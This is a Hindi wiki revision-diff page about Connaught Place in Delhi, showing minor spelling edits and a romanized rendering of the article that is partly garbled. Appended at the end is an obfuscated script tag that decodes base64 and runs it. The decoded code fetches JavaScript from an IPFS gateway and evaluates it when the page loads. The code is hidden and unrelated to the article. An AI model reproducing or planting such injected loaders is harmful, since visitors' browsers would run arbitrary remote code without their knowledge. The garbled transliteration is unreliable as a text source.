Difference between revisions of "कनॉट प्लेस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खरीद" to "ख़रीद")
m (Text replace - "सजा " to "सज़ा ")
Line 9: Line 9:
 
*यहाँ सभी बड़ी-बड़ी कम्पनियों के शोरूम स्थित हैं।  
 
*यहाँ सभी बड़ी-बड़ी कम्पनियों के शोरूम स्थित हैं।  
 
*जॉर्ज पंचम के भाई ड्यूक ऑफ़ कनॉट के आगमन पर 1931 में बने इस बाज़ार में हर प्रकार की ख़रीददारी की जा सकती है।  
 
*जॉर्ज पंचम के भाई ड्यूक ऑफ़ कनॉट के आगमन पर 1931 में बने इस बाज़ार में हर प्रकार की ख़रीददारी की जा सकती है।  
*कनॉट प्लेस के मध्य में रंग-बिरंगी रोशनी से सजा गुलमोहर के पेड़ों से घिरा केन्द्रीय बगीचा भी आया हुआ है।  
+
*कनॉट प्लेस के मध्य में रंग-बिरंगी रोशनी से सज़ा गुलमोहर के पेड़ों से घिरा केन्द्रीय बगीचा भी आया हुआ है।  
 
*कॉलोनियों की तरह यहाँ सभी भवन बने हुए हैं।  
 
*कॉलोनियों की तरह यहाँ सभी भवन बने हुए हैं।  
 
*प्रत्येक भवन के आगे सुन्दर बरामदा है, जो मध्य में स्थित पार्क के सामने है। यहाँ से समान दूरी पर आठ सड़कों का घेरा है।  
 
*प्रत्येक भवन के आगे सुन्दर बरामदा है, जो मध्य में स्थित पार्क के सामने है। यहाँ से समान दूरी पर आठ सड़कों का घेरा है।  

Revision as of 07:19, 3 March 2011

[[chitr:Connaught-Place-Delhi.jpg|thumb|250px|kan aaut ples, dilli
Connaught Place, Delhi]]

  • dilli ek akarshak paryatan sthal hai.
  • kan aaut ph‍les dilh‍li ka pramukh vh‍yavasayik keandr hai.
  • isaka nam briten ke shahi parivar ke sadash‍y dyook aauf kan aaut ke nam par rakha gaya tha.
  • is bazar ka dijain dabh‍lh‍yoo ech nikol aur t aaur rasel ne banaya tha.
  • yah bazar apane samay ka bharat ki sabase b di bazar tha.
  • yah bazar apani sh‍thapana ke 65 sal bad bhi dilh‍li mean kharidari ka pramukh keandr hai.
  • yahaan kitaboan ki dukanean bhi haian jahaan apako bharat ke bare mean janakari dene vali bahut achh‍chhi kitabean mil jaeangi.
  • yahaan sabhi b di-b di kampaniyoan ke shoroom sthit haian.
  • j aaurj pancham ke bhaee dyook aauf kan aaut ke agaman par 1931 mean bane is bazar mean har prakar ki kharidadari ki ja sakati hai.
  • kan aaut ples ke madhy mean rang-birangi roshani se saza gulamohar ke pe doan se ghira kendriy bagicha bhi aya hua hai.
  • k aauloniyoan ki tarah yahaan sabhi bhavan bane hue haian.
  • pratyek bhavan ke age sundar baramada hai, jo madhy mean sthit park ke samane hai. yahaan se saman doori par ath s dakoan ka ghera hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>